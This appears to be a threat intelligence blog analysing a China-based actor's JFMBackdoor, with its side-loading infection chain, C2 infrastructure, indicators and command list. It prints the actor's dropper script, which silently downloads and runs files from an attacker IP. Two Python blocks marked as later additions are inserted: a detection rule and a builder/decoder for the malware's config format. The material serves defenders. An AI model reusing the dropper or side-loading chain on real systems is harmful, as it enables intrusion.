Open Directory, Open Season: Inside Red Lamassu’s JFMBackdoor

Blog, May 21, 2026

Executive summary

PwC Threat Intelligence has been tracking a China-based threat actor we call Red Lamassu (a.k.a. Calypso) since 2019, observing its operations targeting telecommunications and government entities across the Asia Pacific region with a combination of bespoke and shared tooling. This blog is released in tandem with Lumen’s Black Lotus Labs, who detail one portion of Red Lamassu’s operations (an ELF binary we respectively call kworker or Showboat), whilst we focus on the Windows-oriented elements of its operations.

Our analysis revolves around an open directory found during our hunting of Red Lamassu, containing a kworker sample alongside a fully featured Windows backdoor, which we call JFMBackdoor. Delivered via DLL side-loading, JFMBackdoor supports a range of capabilities, including remote shell access, file system operations, network proxying, screenshot capture, and self-removal.

Introducing Red Lamassu

Red Lamassu is our name for a China-based threat actor likely operating out of Sichuan Province, associated with the targeting of telecommunications organisations based in Asia, predominantly Kazakhstan, Afghanistan, and India. Also known as Calypso APT in open source, Red Lamassu uses a myriad of bespoke and shared tooling to achieve a persistent foothold for long term intelligence collection within the victim’s environment.  

Technical writeup – the initial phases

As part of our ongoing tracking of Red Lamassu, we observed an open directory hosted on the IP address: 23.27.201[.]160, active between July and October 2025. Most of the binaries in the directory are part of a connected infection chain, with the exception being the files entitled clear and systemd-ac-update.

Neither clear nor systemd-ac-update are the focus of this blog, with the former being Linux-oriented log file tampering malware, and the latter being a sample of the kworker malware (which Lumen names Showboat in its blog).

Filename            SHA-256
systemd-ac-update   a05fbe8734a5a5a994a44dee9d21134ad7108d24ab0749499fe24fc4b36c4cbc
FLTLIB.dll          047307aca3a94a6fc46c4af25580945defb15574fb236d13d2bb48037cc42208
clear               ac50887e2c513b50b2170d77441b9f7e8afcc774df6b54fdd8aac863095239f4
1.bat               a23d126f0446755859e4d81c0c9b50b65e0062c3de2a014c543f6b263321ad78
scr.mui             ea57b5768c84164fcdb25bb8338d660c5586e17e37cee924c4e5a745510925f3
fltMC.exe           cbef2064cf49b4b27dbf7d0c88c8f7bcdd6a7f25ee9c087beacb48cdd1b78731
flt.bin             b77a233735ff237ab964d2bdb3f6d261a90efb2f86dcde458c419cee528686a9

Table 1 - Files observed hosted on 23.27.201[.]160

Figure 1 - Infection chain overview

We assessed the 23.27.201[.]160 directory to almost certainly be tied to Red Lamassu operations, based on a TLS certificate served by IP addresses we exclusively associate with Red Lamassu:

Fingerprint:    27df475626aafce2ea1548a9f35efb9ad951298c8b11a6adb3ccdfcd5170c677
Subject DN:     O=My Organization
Issuer DN:      O=My Organization
Serial Number:  1
Issued:         2024-07-10 05:51:20
Expires:        2025-07-10 05:51:20

As shown in Figure 2, 1.bat downloads the remaining files into the victim’s %TEMP% directory and then executes fltMC.exe, a legitimate executable that in turn side-loads the downloaded FLTLIB.dll.

It is worth noting that this script will not execute as-is in its current form. However, each individual command within it remains functional when run separately or when the commands are concatenated onto a single line. One possibility is that 1.bat is intended to be passed through an obfuscator that transforms it into a runnable standalone script.

@echo off
powershell -WindowStyle Hidden -Command "& {
    $downloadPath = '%TEMP%'

    # Download the files
    Invoke-WebRequest -Uri 'hxxp[:]//23.27.201[.]160:8000/flt.bin' -OutFile '$downloadPath\flt.bin'
    Invoke-WebRequest -Uri 'hxxp[:]//23.27.201[.]160:8000/FLTLIB.dll' -OutFile '$downloadPath\FLTLIB.dll'
    Invoke-WebRequest -Uri 'hxxp[:]//23.27.201[.]160:8000/scr.mui' -OutFile '$downloadPath\scr.mui'
    Invoke-WebRequest -Uri 'hxxp[:]//23.27.201[.]160:8000/fltMC.exe' -OutFile '$downloadPath\fltMC.exe'
    # Execute file1.exe
    Start-Process -FilePath '$downloadPath\fltMC.exe' -WindowStyle Hidden

}"
exit

Figure 2 - Contents of 1.bat
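As an added defender’s example (not part of the original blog), the following check flags the staging pattern of Figure 2: fltMC.exe and FLTLIB.dll loaded from a user-writable directory rather than a Windows system directory. The event shape and the Image/ImageLoaded field names are assumptions modelled on a Sysmon image-load record, and the sample events are constructed.

```python
# Added example (not PwC's code): flag the side-load layout the blog describes,
# where fltMC.exe is staged in %TEMP% and loads a planted FLTLIB.dll from that
# directory instead of System32. Events are constructed; the Image/ImageLoaded
# field names mimic a Sysmon image-load record and are an assumption.
import ntpath

SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
# Host binary -> DLL it loads by name (the pair from the blog's chain).
SIDELOAD_PAIRS = {"fltmc.exe": "fltlib.dll"}

def _dir(path: str) -> str:
    return ntpath.dirname(path).lower()

def check_image_load(event: dict) -> list[str]:
    """Reasons an image-load event is suspicious; empty list means benign.

    Fires when a known host/DLL pair has either binary outside the Windows
    system directories, which is how 1.bat stages them in %TEMP%.
    """
    host, dll = event["Image"], event["ImageLoaded"]
    host_name = ntpath.basename(host).lower()
    dll_name = ntpath.basename(dll).lower()
    if SIDELOAD_PAIRS.get(host_name) != dll_name:
        return []
    reasons = []
    if _dir(host) not in SYSTEM_DIRS:
        reasons.append(f"{host_name} running from non-system path: {host}")
    if _dir(dll) not in SYSTEM_DIRS:
        reasons.append(f"{dll_name} loaded from non-system path: {dll}")
    return reasons

def triage(events: list[dict]) -> list[tuple[str, list[str]]]:
    """Run check_image_load over a batch and keep only the hits."""
    return [(ev["Image"], r) for ev in events if (r := check_image_load(ev))]

# Constructed sample: a benign system load, the staged %TEMP% load from the
# blog's chain, and an unrelated load the rule must ignore.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\fltMC.exe",
     "ImageLoaded": r"C:\Windows\System32\FLTLIB.dll"},
    {"Image": r"C:\Users\victim\AppData\Local\Temp\fltMC.exe",
     "ImageLoaded": r"C:\Users\victim\AppData\Local\Temp\FLTLIB.dll"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll"},
]

if __name__ == "__main__":
    for image, reasons in triage(SAMPLE_EVENTS):
        print(image, "->", "; ".join(reasons))
```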

FLTLIB.dll finds and opens scr.mui and XOR decrypts the contents with the key Zs0@31=KDw.*7ev. The format of this file is a series of entries that are four bytes of an XOR encrypted length, followed by encrypted data. The decrypted data is configuration data read by both FLTLIB.dll and the final payload, and includes the following strings:

  • flt.bin
  • FLTLIB.dll
  • fltMC.exe
  • C:\Program Files (x86)\Windows Mail\wabmig.exe
  • C:\ProgramData\Microsoft\Network
  • SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
  • namefuture[.]site
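As an added example (not code from PwC or from the malware), here is an encoder and decoder for the scr.mui entry layout just described: a 4-byte XOR-encrypted length followed by XOR-encrypted data under the key Zs0@31=KDw.*7ev. The little-endian length field and the key stream restarting at each field are assumptions, since the blog does not state them; the sample strings are those listed above, assembled into a constructed blob.

```python
# Added example (not PwC's code): encoder/decoder for the scr.mui layout the
# blog describes - entries of [4-byte XOR-encrypted length][encrypted data].
# Assumed (not stated on the page): little-endian length, key restarting per field.
import struct

KEY = b"Zs0@31=KDw.*7ev"          # key quoted in the blog

def xor_bytes(data: bytes, key: bytes = KEY) -> bytes:
    """Repeating-key XOR; symmetric, so it both encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def parse_config(blob: bytes) -> list[str]:
    """Walk the entry stream and return the decrypted strings.

    Stops cleanly on a truncated trailing entry instead of raising, which
    is what you want when carving a partially overwritten file.
    """
    entries, pos = [], 0
    while pos + 4 <= len(blob):
        (length,) = struct.unpack("<I", xor_bytes(blob[pos:pos + 4]))
        pos += 4
        if length > len(blob) - pos:      # truncated / corrupt entry
            break
        entries.append(xor_bytes(blob[pos:pos + length]).decode("utf-8", "replace"))
        pos += length
    return entries

def build_config(strings: list[str]) -> bytes:
    """Inverse of parse_config: produce a blob in the described layout."""
    out = bytearray()
    for s in strings:
        data = s.encode("utf-8")
        out += xor_bytes(struct.pack("<I", len(data)))
        out += xor_bytes(data)
    return bytes(out)

# Constructed sample using the strings the blog lists for this scr.mui.
SAMPLE_STRINGS = [
    "flt.bin", "FLTLIB.dll", "fltMC.exe",
    r"C:\Program Files (x86)\Windows Mail\wabmig.exe",
    r"C:\ProgramData\Microsoft\Network",
    r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows",
    "namefuture[.]site",
]
SAMPLE_BLOB = build_config(SAMPLE_STRINGS)

if __name__ == "__main__":
    for entry in parse_config(SAMPLE_BLOB):
        print(entry)
```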

FLTLIB.dll then loads the file entitled flt.bin in memory and executes it. flt.bin is a shellcode stub that then decodes and loads the final embedded payload PE file into memory, the details of which we provide below:

SHA-256:    176aec5d33c459a42e7e4e984a718c52e11213ef9a6aa961b483a836fc22b507
Filename:   N/A
File type:  Win32 DLL
File size:  1,119,744 bytes

The decoded payload is a fully functional backdoor we have named JFMBackdoor (on account of a hardcoded filepath within the malware: C:\Users\public\jfm). It implements its command and sub-command handling over the CppServer library classes TCPSession, WSSession and WSSSession, communicating with its C2: namefuture[.]site.

The command and sub-command functionality is extensive. Whilst the full command list is provided in Appendix B, we summarise JFMBackdoor’s functionality below:

  • Remote Shell Access: Provides two reverse shell variants, a standard one and a version that launches suspended and detaches from the console to evade inspection by other processes.
  • File System Operations: Full file management including reading, writing, copying, moving, deleting files/folders, directory listing, file search by pattern, file execution, timestomping, and modifying file attributes.
  • Network Proxying: Ability to establish TCP proxy sessions.
  • Process & Service Management: Can enumerate, create, and terminate processes, as well as enumerate, start, stop, and delete Windows services.
  • Network Reconnaissance: Gathers active TCP/UDP connection tables and can manipulate TCP entries.
  • Registry Manipulation: Full Create, Read, Update, and Delete (CRUD) operations, including the ability to enumerate, create, modify, rename, and delete registry keys and values.
  • Screenshot Capture: Takes screenshots using GDI+ functions, then Base64-encodes and XOR-encrypts them before saving to disk for exfiltration.
  • Self-Management: Can create and reload encrypted configuration files, create services, and uninstall itself for anti-forensic purposes.
  • Configuration Management: Stores and reloads encrypted configuration from files (scr.mui, btasc.cfg), allowing the operator to dynamically update the malware's behavior.

Additional files 

The aforementioned key used in FLTLIB.dll to decode scr.mui – Zs0@31=KDw.*7ev – is also observed across three other samples:

SHA-256                                                           Filename           Upload submitter country (CC)
b118f74dc2b974678a50349d04686f6b2df4b287a69e40c4513cd603c7271793  CiWinCng32.dll     KZ
1003bc9e3650fd290e44fd79b270c1b29f572fbb7647fa2bbf1f600d53673b53  scr.mui            CN
f820e4e4c5d433714842f6d64d1a8773958f782cde8d27f6a54d4f9862598933  sllauncherloc.dll  CN

Table 2 - Additional observed files that contain the Zs0@31=KDw.*7ev decryption key

The file entitled scr.mui contained the following configuration data, in particular revealing three new domains:

  • sl.bin
  • sllauncherloc.dll
  • C:\Windows\SysWOW64\msdt.exe
  • C:\ProgramData\Microsoft\Network
  • SOFTWARE\Microsoft\Windows NT\CurrentVersion\Window
  • en[.]cumm[.]info
  • xcent[.]online
  • cumm[.]info

Additional infrastructure – tying it all together

From the analysis above, we found the following C2 domains either used or embedded in the malware:

  • en[.]cumm[.]info;
  • xcent[.]online;
  • cumm[.]info; and,
  • namefuture[.]site

Whilst these were hosted behind Cloudflare, a Cloudflare certificate for namefuture[.]site was served by the IP address 166.88.11[.]196, and the domain also resolved to 139.180.223[.]193.

Fingerprint:    5e86298e3a62404ee4b019246d8da7a7451ba8f9c1f956c32ea4a0ff4e43f553
Subject DN:     O=CloudFlare, Inc., OU=CloudFlare Origin CA, CN=CloudFlare Origin Certificate
Issuer DN:      C=US, O=CloudFlare, Inc., OU=CloudFlare Origin SSL Certificate Authority, L=San Francisco, ST=California
All Names:      *[.]namefuture[.]site, namefuture[.]site
Serial Number:  722215547421393549906800483143167899186483629093

The IPs 166.88.11[.]196 and 139.180.223[.]193 are also seen serving an additional CloudFlare certificate associated with the domain newsprojects[.]online – the C2 used in one of the kworker samples we have observed.

Fingerprint:    8b0e14e0684e00aee9cbf4fd22b2a5da08443f9a0f9ace4972803e29050bcc69
Subject DN:     O=CloudFlare, Inc., OU=CloudFlare Origin CA, CN=CloudFlare Origin Certificate
Issuer DN:      C=US, O=CloudFlare, Inc., OU=CloudFlare Origin SSL Certificate Authority, L=San Francisco, ST=California
All Names:      *[.]newsprojects[.]online, newsprojects[.]online
Serial Number:  604003291824433169701962900588762674473924908065

This newsprojects[.]online certificate was also observed on the following IP addresses:

IP address         First observed  Last observed
166.88.99[.]32     2026-04-23      2026-05-12
166.88.11[.]196    2025-04-18      2026-05-12
66.42.49[.]27      2024-11-07      2024-11-07
45.76.157[.]243    2023-12-12      2025-01-21
207.90.205[.]55    2024-03-04      2025-01-01
139.180.223[.]193  2023-12-12      2024-12-06
193.124.93[.]153   2023-10-27      2023-11-13
152.32.159[.]11    2023-12-13      2024-12-10

Table 3 - Observed hosts that served the newsprojects[.]online certificate

Figure 3 - Overview of connections between IoCs found during this analysis attributed to Red Lamassu

We also observed DNS resolutions from newsprojects[.]online to 64.227.128[.]21 and 23.27.201[.]115, with the latter also resolving xcent[.]online.

Targeting

During analysis of the open directory contents, we identified multiple artefacts tying this intrusion to a telecommunications provider in Afghanistan:

  • FLTBIN.dll was uploaded to an online multi-antivirus scanner from a user in Afghanistan; and,
  • The O=My Organization certificate referenced at the beginning of this blog was also hosted on the IP: 195.86.120[.]2. This IP has hosted both a legitimate certificate belonging to an Afghan government entity, as well as a separate certificate that appears to be associated with a domain controller belonging to an Afghan telecommunications provider.

The targeting of Afghanistan and its telecommunications sector aligns with what we assess to almost certainly be Red Lamassu’s wider operational goals and objectives. In our private reporting, we have observed the threat actor targeting the telecommunications sectors of Kazakhstan, Thailand, and India, using much of the tooling outlined in this blog.[1][2][3][4][5]

[1] ‘Red Lamassu opens another vault and exposes likely Indian government Compromise’, PwC Threat Intelligence, CTO-TIB-20260513-01A

[2] ‘kworker in Kazakhstan’, PwC Threat Intelligence, CTO-TIB-20260504-01A

[3] ‘Red Lamassu open directory exposes Asian targeting’, PwC Threat Intelligence, CTO-TIB-20260421-01A

[4] ‘Red Lamassu continues using PlugX’, PwC Threat Intelligence, CTO-TIB-20260123-01A

[5] ‘The Silence of the Logins PAM edition’, PwC Threat Intelligence, CTO-TIB-20251027-01A

The indicators of compromise (IOCs) associated with this blog are available on our GitHub page.

Appendix B – JFMBackdoor command list

Command  Subcommand  Description
0xA      N/A         Unknown - likely internal state management
0xB      N/A         Unknown - likely internal state management
0xC      N/A         Unknown - likely internal state management
0xD      0xA         Uses CreatePipe and CreateProcessW to start a reverse shell session
         0xB         Terminates the reverse shell session
         0xC         Terminates the reverse shell session
         0xD         Writes data to the reverse shell using WriteFile on the open pipe
0xAD     0xA         Uses CreatePipe and CreateProcessW to start a reverse shell session suspended. Uses ResumeThread then FreeConsole and AttachConsole to prevent inspection by another process.
         0xB         Terminates the reverse shell session
         0xC         Terminates the reverse shell session
         0xD         Uses WriteConsoleInputW to write to the open pipe
0xE      0x0         Gathers drive information
         0x1         Directory list
         0x3         Recursively lists directory
         0x4         Deletes a file
         0x5         Reads metadata about a file
         0x6         Unknown
         0x7         Writes a file to disk
         0x8         Reads a file from disk
         0x9         Use CopyFileW
         0xA         Use MoveFileW
         0xB         Use CreateDirectoryW
         0xC         Use MoveFileExW
         0xD         Use DeleteFileW
         0xE         Use SHFileOperationW to delete a folder
         0xF         Use CreateProcessW to execute a file
         0x10        Use SetFileTime to timestomp a file
         0x11        Use SetFileAttributesW
         0x12        Find files in a directory matching a pattern
0xF      0x0         Unknown - proxy related
         0x1         Begin TCP proxy session
         0x2         Unknown - proxy related
0x10     0x0         List processes
         0x1         TerminateProcess
         0x3         Uses CreateProcessAsUserW
0x11     N/A         Uninstall self from registry, services, terminate self and delete from disk.
0x20     0x0         Gather TCP and UDP connection information via GetExtendedTcpTable and GetExtendedUdpTable
         0x1         Use SetTcpEntry
0x30     0x0         Create C:\Users\public\jfm (\ProgramData and \UnistoreDB) folders and write btasc.cfg encrypted configuration to disk
         0x1         Write btasc.cfg to disk
         0x3         Manage .temp and .jfm files in the ProgramData and UnistoreDB folders
0x41     0x0         Enumerate registry keys
         0x1         Use RegSetKeyValueW
         0x2         Use RegDeleteKeyW
         0x3         Use RegDeleteKeyValueW
         0x4         Use RegRenameKey
         0x6         Use RegSetKeyValueW
0x88     N/A         Launch self via WinExec and sc start
0xB1     N/A         Launch a process with WinExec and cmd /c
0xBB     N/A         Terminate current malware process
0xCC     0x0         Delete file in C:\ProgramData\Windows Multimedia
         0x1         Append to a file named ROG
         0x3         Append to a file named ROG
0xCE     0x0         Call CreateProcessA with ROG file as argument
         0x1         Uses CreateFileA
         0x2         Uses gdiplus.dll functions to create a screenshot and save it to disk Base64 encoded and XOR encrypted
0xCF     0x0         Reloads configuration data from scr.mui file
         0x1         Writes current configuration to scr.mui encrypted
0xF1     0x0         Enumerate services
         0x1         Use DeleteService
         0x2         Use StartServiceW
         0x3         Use ControlService

Authors

Kris McConkey
Global Threat Intelligence Lead Partner, PwC United Kingdom

Matt Carey
Global Threat Intelligence Lead, Director, PwC Sweden

Rachel Mullan
Global Threat Intelligence Lead, Director, PwC United Kingdom

Allison Wikoff
Global Threat Intelligence Lead, Director, PwC United States

Jason Smart
Director, Threat Intelligence APAC, PwC Australia
